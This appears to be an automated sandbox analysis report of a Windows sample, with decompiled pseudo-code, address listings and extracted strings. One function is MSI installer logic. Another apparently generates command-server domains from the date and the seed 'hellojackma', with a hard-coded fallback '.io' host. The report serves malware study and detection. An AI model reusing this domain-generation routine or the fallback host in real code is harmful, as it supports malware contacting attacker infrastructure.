																_t263 = L" REINSTALL=ALL";
																if( *(_t222 + 0xb8) == 0) {
																	goto L65;
																}
																goto L64;
															}
															_t223 = _t212 - 1;
															__eflags = _t223;
															if(_t223 == 0) {
																goto L62;
															}
															_t251 = 0;
															_t224 = _t223 - 1;
															__eflags = _t224;
															if(_t224 == 0) {
																_t225 =  *((intOrPtr*)(_t273 + 8));
																__eflags =  *(_t225 + 0xb8);
																if( *(_t225 + 0xb8) != 0) {
																	L58:
																	_t285 = E00433C35(_t258,  &_v1588, L" REINSTALLMODE=\"vomus\" REBOOT=ReallySuppress", _t251);
																	__eflags = _t285;
																	if(__eflags >= 0) {
																		_t285 = E00435621(__eflags, _v1592, _v1588,  &_v1600);
																		__eflags = _t285;
																		if(_t285 >= 0) {
																			goto L78;
																		}
																		_push("Failed to perform minor upgrade of MSI package.");
																		goto L83;
																	}
																	_push("Failed to add reinstall mode and reboot suppression properties on minor upgrade.");
																	goto L83;
																}
																_t285 = E00433C35( &_v1596,  &_v1588, L" REINSTALL=ALL", 0);
																__eflags = _t285;
																if(_t285 >= 0) {
																	goto L58;
																}
																_push("Failed to add reinstall all property on minor upgrade.");
																goto L83;
															}
															__eflags = _t224 == 1;
															if(_t224 == 1) {
																goto L74;
															}
															goto L6;
														}
														_push("Failed to add patch properties to obfuscated argument string.");
														goto L27;
													}
													_push("Failed to add patch properties to argument string.");
													goto L27;
												}
												_push("Failed to add feature action properties to obfuscated argument string.");
												goto L27;
											}
											_push("Failed to add feature action properties to argument string.");
											goto L27;
										}
										_push("Failed to add obfuscated properties to argument string.");
										goto L27;
									}
									_push("Failed to add properties to argument string.");
									goto L27;
								}
								__eflags =  *_t156;
								if( *_t156 == 0) {
									goto L35;
								}
								_t285 = E00435046(_v1624, _t156, 0);
								__eflags = _t285;
								if(_t285 >= 0) {
									_t256 = 0;
									__eflags = 0;
									goto L35;
								}
								_push( *(_t273 + 0xc));
								E00430A57(_t285, "Failed to enable logging for package: %ls to: %ls",  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)))));
								goto L5;
							}
							_push("Failed to initialize external UI handler.");
							goto L27;
						}
						_push("Failed to build MSI path.");
						goto L27;
					}
					E00430A57(_t275, "Failed to get cached path for package: %ls",  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)))));
					goto L5;
				}
				if( *((intOrPtr*)(_t273 + 0x18)) != 1) {
					__eflags =  *((intOrPtr*)(_t273 + 0x18)) - 2;
					if( *((intOrPtr*)(_t273 + 0x18)) != 2) {
						goto L23;
					}
					_t268 =  *((intOrPtr*)(_t273 + 8));
					__eflags =  *(_t268 + 0x14);
					_push( &_v1604);
					_push(L"VersionString");
					_t238 = 2;
					_t239 =  !=  ? _t271 : _t238;
					_push( !=  ? _t271 : _t238);
					_push(0);
					_push( *((intOrPtr*)(_t268 + 0x90)));
					_t240 = E00435361(_t268);
					__eflags = _t240;
					if(_t240 < 0) {
						goto L23;
					}
					_push(4);
					L4:
					E0040E76E();
					_push(E0040E2BB( *((intOrPtr*)(_t273 + 0x18))));
					E00402003(2, 0x2000013e,  *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)))));
					goto L5;
				}
				_push( &_v1604);
				_push(L"VersionString");
				_t246 = 2;
				_t247 =  !=  ? _t271 : _t246;
				_push( !=  ? _t271 : _t246);
				_push(0);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t273 + 8)) + 0x90)));
				if(E00435361( *((intOrPtr*)(_t273 + 8))) >= 0) {
					goto L23;
				} else {
					_push(2);
					goto L4;
				}
			}
























































                                                                                                                                                                  0x0041b303
                                                                                                                                                                  0x0041b30a
                                                                                                                                                                  0x0041b310
                                                                                                                                                                  0x0041b319
                                                                                                                                                                  0x0041b323
                                                                                                                                                                  0x0041b327
                                                                                                                                                                  0x0041b331
                                                                                                                                                                  0x0041b334
                                                                                                                                                                  0x0041b33d
                                                                                                                                                                  0x0041b342
                                                                                                                                                                  0x0041b350
                                                                                                                                                                  0x0041b351
                                                                                                                                                                  0x0041b352
                                                                                                                                                                  0x0041b358
                                                                                                                                                                  0x0041b360
                                                                                                                                                                  0x0041b368
                                                                                                                                                                  0x0041b36e
                                                                                                                                                                  0x0041b374
                                                                                                                                                                  0x0041b37a
                                                                                                                                                                  0x0041b380
                                                                                                                                                                  0x0041b386
                                                                                                                                                                  0x0041b389
                                                                                                                                                                  0x0041b4c0
                                                                                                                                                                  0x0041b4c0
                                                                                                                                                                  0x0041b4ce
                                                                                                                                                                  0x0041b4d1
                                                                                                                                                                  0x0041b4ec
                                                                                                                                                                  0x0041b4ee
                                                                                                                                                                  0x0041b4f0
                                                                                                                                                                  0x0041b522
                                                                                                                                                                  0x0041b529
                                                                                                                                                                  0x0041b52b
                                                                                                                                                                  0x0041b55c
                                                                                                                                                                  0x0041b563
                                                                                                                                                                  0x0041b565
                                                                                                                                                                  0x0041b56e
                                                                                                                                                                  0x0041b571
                                                                                                                                                                  0x0041b573
                                                                                                                                                                  0x0041b575
                                                                                                                                                                  0x0041b5ac
                                                                                                                                                                  0x0041b5ca
                                                                                                                                                                  0x0041b5d1
                                                                                                                                                                  0x0041b5d3
                                                                                                                                                                  0x0041b5e4
                                                                                                                                                                  0x0041b5fe
                                                                                                                                                                  0x0041b605
                                                                                                                                                                  0x0041b607
                                                                                                                                                                  0x0041b620
                                                                                                                                                                  0x0041b627
                                                                                                                                                                  0x0041b629
                                                                                                                                                                  0x0041b642
                                                                                                                                                                  0x0041b649
                                                                                                                                                                  0x0041b64b
                                                                                                                                                                  0x0041b664
                                                                                                                                                                  0x0041b66b
                                                                                                                                                                  0x0041b66d
                                                                                                                                                                  0x0041b686
                                                                                                                                                                  0x0041b68d
                                                                                                                                                                  0x0041b68f
                                                                                                                                                                  0x0041b69b
                                                                                                                                                                  0x0041b6a9
                                                                                                                                                                  0x0041b6b0
                                                                                                                                                                  0x0041b6b1
                                                                                                                                                                  0x0041b6bf
                                                                                                                                                                  0x0041b6c3
                                                                                                                                                                  0x0041b6d8
                                                                                                                                                                  0x0041b6e3
                                                                                                                                                                  0x0041b6e3
                                                                                                                                                                  0x0041b6e4
                                                                                                                                                                  0x0041b8cd
                                                                                                                                                                  0x0041b8dc
                                                                                                                                                                  0x0041b8e3
                                                                                                                                                                  0x0041b8e5
                                                                                                                                                                  0x0041b8ee
                                                                                                                                                                  0x0041b90a
                                                                                                                                                                  0x0041b90f
                                                                                                                                                                  0x0041b911
                                                                                                                                                                  0x0041b943
                                                                                                                                                                  0x0041b945
                                                                                                                                                                  0x0041b94b
                                                                                                                                                                  0x0041b959
                                                                                                                                                                  0x0041b961
                                                                                                                                                                  0x0041b961
                                                                                                                                                                  0x0041b963
                                                                                                                                                                  0x0041b965
                                                                                                                                                                  0x0041b3ed
                                                                                                                                                                  0x0041b3f4
                                                                                                                                                                  0x0041b400
                                                                                                                                                                  0x0041b408
                                                                                                                                                                  0x0041b408
                                                                                                                                                                  0x0041b414
                                                                                                                                                                  0x0041b41c
                                                                                                                                                                  0x0041b41c
                                                                                                                                                                  0x0041b428
                                                                                                                                                                  0x0041b430
                                                                                                                                                                  0x0041b430
                                                                                                                                                                  0x0041b43c
                                                                                                                                                                  0x0041b444
                                                                                                                                                                  0x0041b444
                                                                                                                                                                  0x0041b450
                                                                                                                                                                  0x0041b458
                                                                                                                                                                  0x0041b458
                                                                                                                                                                  0x0041b463
                                                                                                                                                                  0x0041b465
                                                                                                                                                                  0x0041b986
                                                                                                                                                                  0x0041b46b
                                                                                                                                                                  0x0041b46b
                                                                                                                                                                  0x0041b46c
                                                                                                                                                                  0x0041b978
                                                                                                                                                                  0x0041b472
                                                                                                                                                                  0x0041b473
                                                                                                                                                                  0x0041b47f
                                                                                                                                                                  0x0041b47f
                                                                                                                                                                  0x0041b473
                                                                                                                                                                  0x0041b46c
                                                                                                                                                                  0x0041b998
                                                                                                                                                                  0x0041b96b
                                                                                                                                                                  0x0041b96b
                                                                                                                                                                  0x0041b918
                                                                                                                                                                  0x0041b918
                                                                                                                                                                  0x0041b919
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b91f
                                                                                                                                                                  0x0041b965
                                                                                                                                                                  0x0041b913
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b913
                                                                                                                                                                  0x0041b8e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b8e7
                                                                                                                                                                  0x0041b6ea
                                                                                                                                                                  0x0041b6ea
                                                                                                                                                                  0x0041b6eb
                                                                                                                                                                  0x0041b871
                                                                                                                                                                  0x0041b871
                                                                                                                                                                  0x0041b873
                                                                                                                                                                  0x0041b885
                                                                                                                                                                  0x0041b887
                                                                                                                                                                  0x0041b889
                                                                                                                                                                  0x0041b8ad
                                                                                                                                                                  0x0041b8af
                                                                                                                                                                  0x0041b8b1
                                                                                                                                                                  0x0041b8ba
                                                                                                                                                                  0x0041b8c3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b8c3
                                                                                                                                                                  0x0041b8b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b8b3
                                                                                                                                                                  0x0041b88b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b88b
                                                                                                                                                                  0x0041b6f1
                                                                                                                                                                  0x0041b6f1
                                                                                                                                                                  0x0041b6f2
                                                                                                                                                                  0x0041b84d
                                                                                                                                                                  0x0041b861
                                                                                                                                                                  0x0041b863
                                                                                                                                                                  0x0041b865
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b867
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b867
                                                                                                                                                                  0x0041b6f8
                                                                                                                                                                  0x0041b6f8
                                                                                                                                                                  0x0041b6f9
                                                                                                                                                                  0x0041b792
                                                                                                                                                                  0x0041b792
                                                                                                                                                                  0x0041b796
                                                                                                                                                                  0x0041b7aa
                                                                                                                                                                  0x0041b7aa
                                                                                                                                                                  0x0041b7ac
                                                                                                                                                                  0x0041b7ac
                                                                                                                                                                  0x0041b7ba
                                                                                                                                                                  0x0041b7bd
                                                                                                                                                                  0x0041b7c4
                                                                                                                                                                  0x0041b7c5
                                                                                                                                                                  0x0041b7cc
                                                                                                                                                                  0x0041b7da
                                                                                                                                                                  0x0041b7e4
                                                                                                                                                                  0x0041b7e6
                                                                                                                                                                  0x0041b7f2
                                                                                                                                                                  0x0041b813
                                                                                                                                                                  0x0041b815
                                                                                                                                                                  0x0041b839
                                                                                                                                                                  0x0041b83b
                                                                                                                                                                  0x0041b83d
                                                                                                                                                                  0x0041b3eb
                                                                                                                                                                  0x0041b3eb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b3eb
                                                                                                                                                                  0x0041b843
                                                                                                                                                                  0x0041b532
                                                                                                                                                                  0x0041b532
                                                                                                                                                                  0x0041b533
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b539
                                                                                                                                                                  0x0041b817
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b817
                                                                                                                                                                  0x0041b7e8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b7e8
                                                                                                                                                                  0x0041b798
                                                                                                                                                                  0x0041b79d
                                                                                                                                                                  0x0041b7a3
                                                                                                                                                                  0x0041b7a8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b7a8
                                                                                                                                                                  0x0041b6ff
                                                                                                                                                                  0x0041b6ff
                                                                                                                                                                  0x0041b700
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b706
                                                                                                                                                                  0x0041b708
                                                                                                                                                                  0x0041b708
                                                                                                                                                                  0x0041b709
                                                                                                                                                                  0x0041b717
                                                                                                                                                                  0x0041b71a
                                                                                                                                                                  0x0041b720
                                                                                                                                                                  0x0041b744
                                                                                                                                                                  0x0041b756
                                                                                                                                                                  0x0041b758
                                                                                                                                                                  0x0041b75a
                                                                                                                                                                  0x0041b77e
                                                                                                                                                                  0x0041b780
                                                                                                                                                                  0x0041b782
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b788
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b788
                                                                                                                                                                  0x0041b75c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b75c
                                                                                                                                                                  0x0041b734
                                                                                                                                                                  0x0041b736
                                                                                                                                                                  0x0041b738
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b73a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b73a
                                                                                                                                                                  0x0041b70b
                                                                                                                                                                  0x0041b70c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b712
                                                                                                                                                                  0x0041b691
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b691
                                                                                                                                                                  0x0041b66f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b66f
                                                                                                                                                                  0x0041b64d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b64d
                                                                                                                                                                  0x0041b62b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b62b
                                                                                                                                                                  0x0041b609
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b609
                                                                                                                                                                  0x0041b5d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b5d5
                                                                                                                                                                  0x0041b577
                                                                                                                                                                  0x0041b57a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b589
                                                                                                                                                                  0x0041b58b
                                                                                                                                                                  0x0041b58d
                                                                                                                                                                  0x0041b5aa
                                                                                                                                                                  0x0041b5aa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b5aa
                                                                                                                                                                  0x0041b58f
                                                                                                                                                                  0x0041b59d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b5a2
                                                                                                                                                                  0x0041b567
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b567
                                                                                                                                                                  0x0041b52d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b52d
                                                                                                                                                                  0x0041b4fd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b502
                                                                                                                                                                  0x0041b393
                                                                                                                                                                  0x0041b48a
                                                                                                                                                                  0x0041b48e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b490
                                                                                                                                                                  0x0041b499
                                                                                                                                                                  0x0041b49c
                                                                                                                                                                  0x0041b49d
                                                                                                                                                                  0x0041b4a4
                                                                                                                                                                  0x0041b4a5
                                                                                                                                                                  0x0041b4a8
                                                                                                                                                                  0x0041b4a9
                                                                                                                                                                  0x0041b4aa
                                                                                                                                                                  0x0041b4b0
                                                                                                                                                                  0x0041b4b5
                                                                                                                                                                  0x0041b4b7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b4b9
                                                                                                                                                                  0x0041b3c8
                                                                                                                                                                  0x0041b3c8
                                                                                                                                                                  0x0041b3d6
                                                                                                                                                                  0x0041b3e3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b3e8
                                                                                                                                                                  0x0041b3a5
                                                                                                                                                                  0x0041b3a6
                                                                                                                                                                  0x0041b3ad
                                                                                                                                                                  0x0041b3ae
                                                                                                                                                                  0x0041b3b1
                                                                                                                                                                  0x0041b3b2
                                                                                                                                                                  0x0041b3b3
                                                                                                                                                                  0x0041b3c0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b3c6
                                                                                                                                                                  0x0041b3c6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041b3c6

                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add reboot suppression property on install., xrefs: 0041B88B
                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 0041B4F7
                                                                                                                                                                  • Failed to perform minor upgrade of MSI package., xrefs: 0041B788
                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 0041B7F2, 0041B8EE
                                                                                                                                                                  • REINSTALL=ALL, xrefs: 0041B723, 0041B7A3
                                                                                                                                                                  • Failed to add the list of dependencies to ignore to the properties., xrefs: 0041B817, 0041B913
                                                                                                                                                                  • %ls %ls=ALL, xrefs: 0041B803, 0041B8FF
                                                                                                                                                                  • Failed to add reboot suppression property on uninstall., xrefs: 0041B8E7
                                                                                                                                                                  • Failed to run maintanance mode for MSI package., xrefs: 0041B843
                                                                                                                                                                  • Failed to build MSI path., xrefs: 0041B52D
                                                                                                                                                                  • Failed to initialize external UI handler., xrefs: 0041B567
                                                                                                                                                                  • ACTION=ADMIN, xrefs: 0041B850
                                                                                                                                                                  • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 0041B75C
                                                                                                                                                                  • Failed to install MSI package., xrefs: 0041B8B3
                                                                                                                                                                  • Failed to add feature action properties to argument string., xrefs: 0041B62B
                                                                                                                                                                  • Failed to add feature action properties to obfuscated argument string., xrefs: 0041B64D
                                                                                                                                                                  • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 0041B7D4
                                                                                                                                                                  • Failed to add obfuscated properties to argument string., xrefs: 0041B609
                                                                                                                                                                  • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 0041B7E8
                                                                                                                                                                  • Failed to add reinstall all property on minor upgrade., xrefs: 0041B73A
                                                                                                                                                                  • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 0041B745
                                                                                                                                                                  • Failed to add patch properties to obfuscated argument string., xrefs: 0041B691
                                                                                                                                                                  • REBOOT=ReallySuppress, xrefs: 0041B874, 0041B8D0
                                                                                                                                                                  • Failed to add patch properties to argument string., xrefs: 0041B66F
                                                                                                                                                                  • Failed to enable logging for package: %ls to: %ls, xrefs: 0041B597
                                                                                                                                                                  • Failed to add ADMIN property on admin install., xrefs: 0041B867
                                                                                                                                                                  • Failed to uninstall MSI package., xrefs: 0041B96B
                                                                                                                                                                  • Failed to add properties to argument string., xrefs: 0041B5D5
                                                                                                                                                                  • VersionString, xrefs: 0041B3A6, 0041B49D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString
                                                                                                                                                                  • API String ID: 0-2112609193
                                                                                                                                                                  • Opcode ID: f7753b0eeab9370da8cd68039c42f48cdbb814a676401a97e2327f18c4afc607
                                                                                                                                                                  • Instruction ID: d0ea8d03baecc54a40eff6338a2a68ca16ccbdd791837184f34347cbcb9632ef
                                                                                                                                                                  • Opcode Fuzzy Hash: f7753b0eeab9370da8cd68039c42f48cdbb814a676401a97e2327f18c4afc607
                                                                                                                                                                  • Instruction Fuzzy Hash: 4402B271900629AFDB219F55CC41FEAB6A6FF44314F0001ABF908A7251D73A9EE1DBC9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10022710, Relevance: 31.8, APIs: 7, Strings: 11, Instructions: 292timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E10022710(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8) {
				char _v8;
				intOrPtr _v16;
				signed int _v20;
				struct _SYSTEMTIME _v36;
				char _v303;
				char _v304;
				char _v332;
				char _v360;
				char _v388;
				char _v416;
				char _v444;
				char _v472;
				char _v500;
				char _v528;
				char _v556;
				char _v584;
				char _v612;
				char _v640;
				char _v668;
				signed int _v672;
				signed int _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				signed int _v756;
				signed int _v760;
				signed int _v764;
				signed int _v768;
				signed int _v772;
				intOrPtr _t224;

				_push(0xffffffff);
				_push(E10023135);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t224;
				_v672 = 0;
				E10001160( &_v332, __eflags, "http://");
				_v8 = 0;
				_v20 = 0;
				_v304 = 0;
				E1000CF80(__edi,  &_v303, 0, 0x103);
				_v36.wYear = 0;
				_v36.wMonth = 0;
				_v36.wDay = 0;
				_v36.wMinute = 0;
				_v36.wMilliseconds = 0;
				GetLocalTime( &_v36);
				_v676 = _a8;
				_t231 = _v676 - 6;
				if(_v676 <= 6) {
					switch( *((intOrPtr*)(_v676 * 4 +  &M10022CD8))) {
						case 0:
							_push(_v36.wMonth & 0x0000ffff);
							E1000CCA3(_t222,  &_v304, "hellojackma%04d%02d", _v36.wYear & 0x0000ffff);
							_v20 = E1001A4E0(__ebx,  &_v304, _t222, __esi, _t231,  &_v304);
							_v680 = E10001160( &_v360, _t231, _v20);
							_v684 = _v680;
							_v8 = 1;
							E10001A90( &_v332, _v684);
							_v8 = 0;
							E100011A0( &_v360);
							_push(_v20);
							E1000CA40(__ebx, _t222, __esi, _t231);
							_v688 = E10001160( &_v388, _t231, ".com/");
							_v692 = _v688;
							_v8 = 2;
							E10001A90( &_v332, _v692);
							_v8 = 0;
							E100011A0( &_v388);
							goto L9;
						case 1:
							__eax = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__ecx = _v36.wYear & 0x0000ffff;
							__edx =  &_v304;
							E1000CCA3(__edi, __edx, "hellojackma%04d%02d1", _v36.wYear & 0x0000ffff) =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__ecx = _v20;
							__ecx =  &_v416;
							_v696 = E10001160( &_v416, __eflags, _v20);
							__edx = _v696;
							_v700 = _v696;
							_v8 = 3;
							__eax = _v700;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v700);
							_v8 = 0;
							__ecx =  &_v416;
							__eax = E100011A0( &_v416);
							__ecx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v444;
							_v704 = E10001160( &_v444, __eflags, ".com/");
							__edx = _v704;
							_v708 = _v704;
							_v8 = 4;
							__eax = _v708;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v708);
							_v8 = 0;
							__ecx =  &_v444;
							__eax = E100011A0(__ecx);
							goto L9;
						case 2:
							__ecx = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__edx = _v36.wYear & 0x0000ffff;
							 &_v304 = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d2", __edx);
							__ecx =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__edx = _v20;
							__ecx =  &_v472;
							_v712 = E10001160( &_v472, __eflags, _v20);
							__eax = _v712;
							_v716 = _v712;
							_v8 = 5;
							__ecx = _v716;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v716);
							_v8 = 0;
							__ecx =  &_v472;
							__eax = E100011A0( &_v472);
							__edx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v500;
							_v720 = E10001160( &_v500, __eflags, ".com/");
							__eax = _v720;
							_v724 = _v720;
							_v8 = 6;
							__ecx = _v724;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v724);
							_v8 = 0;
							__ecx =  &_v500;
							__eax = E100011A0(__ecx);
							goto L9;
						case 3:
							__edx = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__eax = _v36.wYear & 0x0000ffff;
							__ecx =  &_v304;
							__eax = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d3", _v36.wYear & 0x0000ffff);
							__edx =  &_v304;
							_v20 = E1001A4E0(__ebx,  &_v304, __edi, __esi, __eflags,  &_v304);
							__eax = _v20;
							__ecx =  &_v528;
							_v728 = E10001160( &_v528, __eflags, _v20);
							__ecx = _v728;
							_v732 = _v728;
							_v8 = 7;
							__edx = _v732;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v732);
							_v8 = 0;
							__ecx =  &_v528;
							E100011A0( &_v528) = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v556;
							_v736 = E10001160( &_v556, __eflags, ".com/");
							__ecx = _v736;
							_v740 = _v736;
							_v8 = 8;
							__edx = _v740;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v740);
							_v8 = 0;
							__ecx =  &_v556;
							__eax = E100011A0(__ecx);
							goto L9;
						case 4:
							__eax = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__ecx = _v36.wYear & 0x0000ffff;
							__edx =  &_v304;
							E1000CCA3(__edi, __edx, "hellojackma%04d%02d4", _v36.wYear & 0x0000ffff) =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__ecx = _v20;
							__ecx =  &_v584;
							_v744 = E10001160( &_v584, __eflags, _v20);
							__edx = _v744;
							_v748 = _v744;
							_v8 = 9;
							__eax = _v748;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v748);
							_v8 = 0;
							__ecx =  &_v584;
							__eax = E100011A0( &_v584);
							__ecx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v612;
							_v752 = E10001160( &_v612, __eflags, ".com/");
							__edx = _v752;
							_v756 = _v752;
							_v8 = 0xa;
							__eax = _v756;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v756);
							_v8 = 0;
							__ecx =  &_v612;
							__eax = E100011A0(__ecx);
							goto L9;
						case 5:
							__ecx = _v36.wMonth & 0x0000ffff;
							_push(_v36.wMonth & 0x0000ffff);
							__edx = _v36.wYear & 0x0000ffff;
							 &_v304 = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d5", __edx);
							__ecx =  &_v304;
							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
							__edx = _v20;
							__ecx =  &_v640;
							_v760 = E10001160( &_v640, __eflags, _v20);
							__eax = _v760;
							_v764 = _v760;
							_v8 = 0xb;
							__ecx = _v764;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v764);
							_v8 = 0;
							__ecx =  &_v640;
							__eax = E100011A0( &_v640);
							__edx = _v20;
							_push(_v20);
							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
							__esp = __esp + 4;
							__ecx =  &_v668;
							_v768 = E10001160( &_v668, __eflags, ".com/");
							__eax = _v768;
							_v772 = _v768;
							_v8 = 0xc;
							__ecx = _v772;
							__ecx =  &_v332;
							__eax = E10001A90( &_v332, _v772);
							_v8 = 0;
							__ecx =  &_v668;
							__eax = E100011A0(__ecx);
							goto L9;
						case 6:
							__ecx =  &_v332;
							__eax = E10001AB0(__ecx, __eflags, "back19e64ea00d6ecfe1.io/");
							goto L9;
					}
				}
				L9:
				E10001110(_a4, _t231,  &_v332);
				_v672 = _v672 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v332);
				 *[fs:0x0] = _v16;
				return _a4;
			}

















































                                                                                                                                                                  0x10022713
                                                                                                                                                                  0x10022715
                                                                                                                                                                  0x10022720
                                                                                                                                                                  0x10022721
                                                                                                                                                                  0x1002272e
                                                                                                                                                                  0x10022743
                                                                                                                                                                  0x10022748
                                                                                                                                                                  0x1002274f
                                                                                                                                                                  0x10022756
                                                                                                                                                                  0x1002276b
